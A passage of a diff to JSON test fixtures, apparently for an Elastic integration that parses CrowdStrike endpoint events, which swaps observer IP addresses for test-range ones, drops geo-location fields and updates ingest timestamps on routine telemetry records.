"country_iso_code": "US" - }, - "address": "208.71.20.13", - "vendor": "crowdstrike", - "ip": "208.71.20.13", "serial_number": "ffffffffe5ff467b4f0c4fd41a4462bb", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:27.011Z", "ecs": { @@ -10217,7 +9018,7 @@ }, "related": { "hosts": [ - "208.71.20.13", + "67.43.156.14", "127.0.0.1", "0.0.0.0" ], 
@@ -10225,14 +9026,14 @@ "1789338890" ], "ip": [ - "208.71.20.13", + "67.43.156.14", "127.0.0.1", "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466324800Z", - "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321210562584146513\",\"ContextTimeStamp\":\"1604855127.011\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"53\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffe5ff467b4f0c4fd41a4462bb\",\"aip\":\"208.71.20.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-ae74-065212970c5d\",\"name\":\"NetworkListenIP4MacV5\",\"timestamp\":\"1604855128936\"}", + "ingested": "2021-12-09T13:36:11.151301600Z", + "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321210562584146513\",\"ContextTimeStamp\":\"1604855127.011\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"53\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffe5ff467b4f0c4fd41a4462bb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-ae74-065212970c5d\",\"name\":\"NetworkListenIP4MacV5\",\"timestamp\":\"1604855128936\"}", "created": "2020-11-08T17:05:28.936Z", "kind": "event", "action": "NetworkListenIP4", 
@@ -10270,21 +9071,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.216.134.213",
- "vendor": "crowdstrike",
- "ip": "208.216.134.213",
 "serial_number": "ffffffff59514ea68b4693ddfb9b6643",
+ "address": "67.43.156.13",
 "type": "agent",
- "version": "1007.3.0011603.1"
+ "version": "1007.3.0011603.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.13"
 },
 "@timestamp": "2020-11-08T17:06:25.108Z",
 "ecs": {
@@ -10295,18 +9087,18 @@ "user7" ], "hosts": [ - "208.216.134.213" + "67.43.156.13" ], "hash": [ "3338885535" ], "ip": [ - "208.216.134.213" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466331600Z", - "original": "{\"AuthenticationId\":\"999\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855185.108\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\gpsvc.dll\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"219053851298\",\"RpcClientThreadId\":\"22047924482692\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"gpsvc\",\"TargetProcessId\":\"224116976578\",\"TargetThreadId\":\"22920092479704\",\"TokenType\":\"1\",\"UserName\":\"user7\",\"aid\":\"ffffffff59514ea68b4693ddfb9b6643\",\"aip\":\"208.216.134.213\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStarted\",\"id\":\"ffffffff-1111-11eb-860c-0606af112d55\",\"name\":\"HostedServiceStartedV2\",\"timestamp\":\"1604855184068\"}", + "ingested": "2021-12-09T13:36:11.151308Z", + "original": 
"{\"AuthenticationId\":\"999\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855185.108\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\gpsvc.dll\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"219053851298\",\"RpcClientThreadId\":\"22047924482692\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"gpsvc\",\"TargetProcessId\":\"224116976578\",\"TargetThreadId\":\"22920092479704\",\"TokenType\":\"1\",\"UserName\":\"user7\",\"aid\":\"ffffffff59514ea68b4693ddfb9b6643\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStarted\",\"id\":\"ffffffff-1111-11eb-860c-0606af112d55\",\"name\":\"HostedServiceStartedV2\",\"timestamp\":\"1604855184068\"}", "created": "2020-11-08T17:06:24.068Z", "kind": "event", "action": "HostedServiceStarted", @@ -10354,21 +9146,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.213", - "vendor": "crowdstrike", - "ip": "208.216.134.213", "serial_number": "ffffffff2b5a4bf5afc6682595faa016", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:08:19.018Z", "ecs": { 
@@ -10376,18 +9159,18 @@ }, "related": { "hosts": [ - "208.216.134.213" + "67.43.156.13" ], "hash": [ "3338885535" ], "ip": [ - "208.216.134.213" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466338300Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855299.018\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ServiceDisplayName\":\"wuauserv\",\"TargetProcessId\":\"661455186053\",\"TargetThreadId\":\"24238019995551\",\"aid\":\"ffffffff2b5a4bf5afc6682595faa016\",\"aip\":\"208.216.134.213\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStopped\",\"id\":\"ffffffff-1111-11eb-9b11-0602a5689467\",\"name\":\"HostedServiceStoppedV1\",\"timestamp\":\"1604855302512\"}", + "ingested": "2021-12-09T13:36:11.151314400Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855299.018\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ServiceDisplayName\":\"wuauserv\",\"TargetProcessId\":\"661455186053\",\"TargetThreadId\":\"24238019995551\",\"aid\":\"ffffffff2b5a4bf5afc6682595faa016\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStopped\",\"id\":\"ffffffff-1111-11eb-9b11-0602a5689467\",\"name\":\"HostedServiceStoppedV1\",\"timestamp\":\"1604855302512\"}", "created": "2020-11-08T17:08:22.512Z", "kind": "event", "action": "HostedServiceStopped", 
@@ -10426,21 +9209,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.30.227.225",
- "vendor": "crowdstrike",
- "ip": "208.30.227.225",
 "serial_number": "ffffffff32cb4abc50bc133b31a69946",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.3.0011603.1"
+ "version": "1007.3.0011603.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2020-11-08T17:07:07.625Z",
 "file": {
@@ -10458,18 +9232,18 @@ }, "related": { "hosts": [ - "208.30.227.225" + "67.43.156.14" ], "hash": [ "3338885535" ], "ip": [ - "208.30.227.225" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466345100Z", - "original": "{\"AuthenticationId\":\"3443175\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1091372257857\",\"ContextThreadId\":\"36855848099771\",\"ContextTimeStamp\":\"1604855227.625\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1179\\u0026DEV_0113\\u0026SUBSYS_00011179\\u0026REV_01\\\\4\\u00263ad42678\\u00260\\u002600E0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100\",\"FileObject\":\"18446603341701082336\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"288041\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user12\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\\\TempState\\\\Downloads\\\\ex.pdf.8e41hf8.partial\",\"TokenType\":\"1\",\"aid\":\"ffffffff32cb4abc50bc133b31a69946\",\"aip\":\"208.30.227.225\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PdfFileWritten\",\"id\":\"ffffffff-1111-11eb-baea-02dccfbb7779\",\"name\":\"PdfFileWrittenV11\",\"timestamp\":\"1604855264313\"}", + "ingested": "2021-12-09T13:36:11.151320700Z", + "original": 
"{\"AuthenticationId\":\"3443175\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1091372257857\",\"ContextThreadId\":\"36855848099771\",\"ContextTimeStamp\":\"1604855227.625\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1179\\u0026DEV_0113\\u0026SUBSYS_00011179\\u0026REV_01\\\\4\\u00263ad42678\\u00260\\u002600E0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100\",\"FileObject\":\"18446603341701082336\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"288041\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user12\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\\\TempState\\\\Downloads\\\\ex.pdf.8e41hf8.partial\",\"TokenType\":\"1\",\"aid\":\"ffffffff32cb4abc50bc133b31a69946\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PdfFileWritten\",\"id\":\"ffffffff-1111-11eb-baea-02dccfbb7779\",\"name\":\"PdfFileWrittenV11\",\"timestamp\":\"1604855264313\"}", "created": "2020-11-08T17:07:44.313Z", "kind": "event", "action": "PdfFileWritten", @@ -10531,21 +9305,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.239.110.158", - "vendor": "crowdstrike", - "ip": "208.239.110.158", "serial_number": "ffffffff655344736aca58d17fb570f0", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0012309.1" + "version": "1007.3.0012309.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:06:22.022Z", "ecs": { 
@@ -10553,7 +9318,7 @@
 },
 "related": {
 "hosts": [
- "208.239.110.158"
+ "67.43.156.14"
 ],
 "hash": [
 "50d5fd1290d94d46acca0585311e74d5",
@@ -10561,12 +9326,12 @@ "3998263252" ], "ip": [ - "208.239.110.158" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466352Z", - "original": "{\"AuthenticationId\":\"3783389\",\"CommandLine\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\backgroundTaskHost.exe\\\" -ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca\",\"ConfigBuild\":\"1007.3.0012309.1\",\"ConfigStateHash\":\"3998263252\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\backgroundTaskHost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"4096\",\"MD5HashData\":\"50d5fd1290d94d46acca0585311e74d5\",\"ParentAuthenticationId\":\"3783389\",\"ParentBaseFileName\":\"svchost.exe\",\"ParentProcessId\":\"2439558094566\",\"ProcessCreateFlags\":\"525332\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"16385\",\"ProcessStartTime\":\"1604855181.648\",\"ProcessSxsFlags\":\"1600\",\"RawProcessId\":\"22272\",\"RpcClientProcessId\":\"2439558094566\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37\",\"SessionId\":\"1\",\"SourceProcessId\":\"2439558094566\",\"SourceThreadId\":\"77538684027214\",\"Tags\":\"41, 12094627905582, 12094627906234\",\"TargetProcessId\":\"2450046082233\",\"TokenType\":\"2\",\"UserSid\":\"S-1-12-1-3697283754-1083485977-2164330645-2516515886\",\"WindowFlags\":\"128\",\"aid\":\"ffffffff655344736aca58d17fb570f0\",\"aip\":\"208.239.110.158\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-8462-02ade3b2f949\",\"name\":\"ProcessRollup2V18\",\"timestamp\":\"1604855182022\"}", + "ingested": "2021-12-09T13:36:11.151327Z", + "original": "{\"AuthenticationId\":\"3783389\",\"CommandLine\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\backgroundTaskHost.exe\\\" 
-ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca\",\"ConfigBuild\":\"1007.3.0012309.1\",\"ConfigStateHash\":\"3998263252\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\backgroundTaskHost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"4096\",\"MD5HashData\":\"50d5fd1290d94d46acca0585311e74d5\",\"ParentAuthenticationId\":\"3783389\",\"ParentBaseFileName\":\"svchost.exe\",\"ParentProcessId\":\"2439558094566\",\"ProcessCreateFlags\":\"525332\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"16385\",\"ProcessStartTime\":\"1604855181.648\",\"ProcessSxsFlags\":\"1600\",\"RawProcessId\":\"22272\",\"RpcClientProcessId\":\"2439558094566\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37\",\"SessionId\":\"1\",\"SourceProcessId\":\"2439558094566\",\"SourceThreadId\":\"77538684027214\",\"Tags\":\"41, 12094627905582, 12094627906234\",\"TargetProcessId\":\"2450046082233\",\"TokenType\":\"2\",\"UserSid\":\"S-1-12-1-3697283754-1083485977-2164330645-2516515886\",\"WindowFlags\":\"128\",\"aid\":\"ffffffff655344736aca58d17fb570f0\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-8462-02ade3b2f949\",\"name\":\"ProcessRollup2V18\",\"timestamp\":\"1604855182022\"}", "created": "2020-11-08T17:06:22.022Z", "kind": "event", "action": "ProcessRollup2", 
@@ -10619,24 +9384,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-IA",
- "city_name": "Urbandale",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Iowa",
- "location": {
- "lon": -93.7255,
- "lat": 41.6289
- }
- },
- "address": "208.69.144.69",
- "vendor": "crowdstrike",
- "ip": "208.69.144.69",
 "serial_number": "ffffffff1f32487185fcde66a9dc0528",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.4.0011104.1"
+ "version": "1007.4.0011104.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2020-11-08T17:09:15.388Z",
 "ecs": {
@@ -10647,18 +9400,18 @@ "user8" ], "hosts": [ - "208.69.144.69" + "67.43.156.14" ], "hash": [ "1457965279" ], "ip": [ - "208.69.144.69" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466358800Z", - "original": "{\"AuthenticationId\":\"326190744\",\"AuthenticationUuid\":\"98467113-C771-4845-B71B-89B3CE9F93C9\",\"AuthenticationUuidAsString\":\"13714698-71C7-4548-B71B-89B3CE9F93C9\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"Entitlements\":\"15\",\"UID\":\"326190744\",\"UserPrincipal\":\"user8@dom6\",\"UserSid\":\"S-1-5-21-3629339319-2376021926-2724479216-652382488\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"208.69.144.69\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"UserIdentityMacV2\",\"timestamp\":\"1604855355388\"}", + "ingested": "2021-12-09T13:36:11.151333400Z", + "original": "{\"AuthenticationId\":\"326190744\",\"AuthenticationUuid\":\"98467113-C771-4845-B71B-89B3CE9F93C9\",\"AuthenticationUuidAsString\":\"13714698-71C7-4548-B71B-89B3CE9F93C9\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"Entitlements\":\"15\",\"UID\":\"326190744\",\"UserPrincipal\":\"user8@dom6\",\"UserSid\":\"S-1-5-21-3629339319-2376021926-2724479216-652382488\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"UserIdentityMacV2\",\"timestamp\":\"1604855355388\"}", "created": "2020-11-08T17:09:15.388Z", "kind": "event", "action": "UserIdentity", 
@@ -10692,21 +9445,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.6.139.160", - "vendor": "crowdstrike", - "ip": "208.6.139.160", "serial_number": "ffffffffcdb543135e7fcdf8e5a8fbdb", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:57.555Z", "os": { @@ -10717,18 +9461,18 @@ }, "related": { "hosts": [ - "208.6.139.160" + "67.43.156.14" ], "hash": [ "1874387338" ], "ip": [ - "208.6.139.160" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466365600Z", - "original": "{\"BootArgs\":\" NOEXECUTE=OPTIN HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1874387338\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"MachineDomain\":\"\",\"aid\":\"ffffffffcdb543135e7fcdf8e5a8fbdb\",\"aip\":\"208.6.139.160\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostInfo\",\"id\":\"ffffffff-1111-11eb-9bbd-061290dcd983\",\"name\":\"HostInfoV2\",\"timestamp\":\"1604855157555\"}", + "ingested": "2021-12-09T13:36:11.151339800Z", + "original": "{\"BootArgs\":\" NOEXECUTE=OPTIN HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1874387338\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"MachineDomain\":\"\",\"aid\":\"ffffffffcdb543135e7fcdf8e5a8fbdb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostInfo\",\"id\":\"ffffffff-1111-11eb-9bbd-061290dcd983\",\"name\":\"HostInfoV2\",\"timestamp\":\"1604855157555\"}", "created": "2020-11-08T17:05:57.555Z", "kind": "event", "action": "HostInfo", 
@@ -10778,21 +9522,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.216.134.196",
- "vendor": "crowdstrike",
- "ip": "208.216.134.196",
 "serial_number": "ffffffff16bf4c7bb5ad755a4722025c",
+ "address": "67.43.156.13",
 "type": "agent",
- "version": "1007.3.0011603.1"
+ "version": "1007.3.0011603.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.13"
 },
 "@timestamp": "2020-11-08T15:57:10.593Z",
 "file": {
@@ -10813,19 +9548,19 @@ "user9" ], "hosts": [ - "208.216.134.196" + "67.43.156.13" ], "hash": [ "2642284486" ], "ip": [ - "208.216.134.196" + "67.43.156.13" ] }, "event": { "action": "GenericFileWritten", - "ingested": "2021-11-22T09:23:55.466372400Z", - "original": "{\"AuthenticationId\":\"703298\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2642284486\",\"ContextProcessId\":\"1161025471861\",\"ContextThreadId\":\"34929528116709\",\"ContextTimeStamp\":\"1604851030.593\",\"DiskParentDeviceInstanceId\":\"USB\\\\VID_1058\\u0026PID_2621\\\\57583431453939315A4C5255\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"262fbc677256cf4c8d6c6a227285a072c06830873b000000\",\"FileObject\":\"18446664963104449168\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"1\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"517029\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume5\\\\01.png.tmp$$\",\"TokenType\":\"1\",\"UserName\":\"user9\",\"aid\":\"ffffffff16bf4c7bb5ad755a4722025c\",\"aip\":\"208.216.134.196\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"GenericFileWritten\",\"id\":\"ffffffff-1111-11eb-800a-06cecfd73923\",\"name\":\"GenericFileWrittenV11\",\"timestamp\":\"1604851031298\"}", + "ingested": "2021-12-09T13:36:11.151346200Z", + "original": 
"{\"AuthenticationId\":\"703298\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2642284486\",\"ContextProcessId\":\"1161025471861\",\"ContextThreadId\":\"34929528116709\",\"ContextTimeStamp\":\"1604851030.593\",\"DiskParentDeviceInstanceId\":\"USB\\\\VID_1058\\u0026PID_2621\\\\57583431453939315A4C5255\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"262fbc677256cf4c8d6c6a227285a072c06830873b000000\",\"FileObject\":\"18446664963104449168\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"1\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"517029\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume5\\\\01.png.tmp$$\",\"TokenType\":\"1\",\"UserName\":\"user9\",\"aid\":\"ffffffff16bf4c7bb5ad755a4722025c\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"GenericFileWritten\",\"id\":\"ffffffff-1111-11eb-800a-06cecfd73923\",\"name\":\"GenericFileWrittenV11\",\"timestamp\":\"1604851031298\"}", "id": "ffffffff-1111-11eb-800a-06cecfd73923", "created": "2020-11-08T15:57:11.298Z" }, @@ -10867,21 +9602,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.150.196", - "vendor": "crowdstrike", - "ip": "208.216.150.196", "serial_number": "ffffffff896b43725b83c79aa79959da", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T15:54:59.164Z", "ecs": { 
@@ -10889,18 +9615,18 @@ }, "related": { "hosts": [ - "208.216.150.196" + "67.43.156.13" ], "hash": [ "666346415" ], "ip": [ - "208.216.150.196" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466379200Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"666346415\",\"ContextProcessId\":\"1717987648455\",\"ContextThreadId\":\"55064470042288\",\"ContextTimeStamp\":\"1604850899.164\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume27\",\"aid\":\"ffffffff896b43725b83c79aa79959da\",\"aip\":\"208.216.150.196\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeUnmounted\",\"id\":\"ffffffff-1111-11eb-9f70-0634389d9ea9\",\"name\":\"FsVolumeUnmountedV2\",\"timestamp\":\"1604850899812\"}", + "ingested": "2021-12-09T13:36:11.151387500Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"666346415\",\"ContextProcessId\":\"1717987648455\",\"ContextThreadId\":\"55064470042288\",\"ContextTimeStamp\":\"1604850899.164\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume27\",\"aid\":\"ffffffff896b43725b83c79aa79959da\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeUnmounted\",\"id\":\"ffffffff-1111-11eb-9f70-0634389d9ea9\",\"name\":\"FsVolumeUnmountedV2\",\"timestamp\":\"1604850899812\"}", "created": "2020-11-08T15:54:59.812Z", "kind": "event", "action": "FsVolumeUnmounted", 
@@ -10936,21 +9662,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.193.200.164", - "vendor": "crowdstrike", - "ip": "208.193.200.164", "serial_number": "ffffffff899541b94b9adff8922aa70a", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0009906.1" + "version": "1007.4.0009906.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T15:58:18.548Z", "ecs": { @@ -10958,18 +9675,18 @@ }, "related": { "hosts": [ - "208.193.200.164" + "67.43.156.14" ], "hash": [ "3429017943" ], "ip": [ - "208.193.200.164" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466385900Z", - "original": 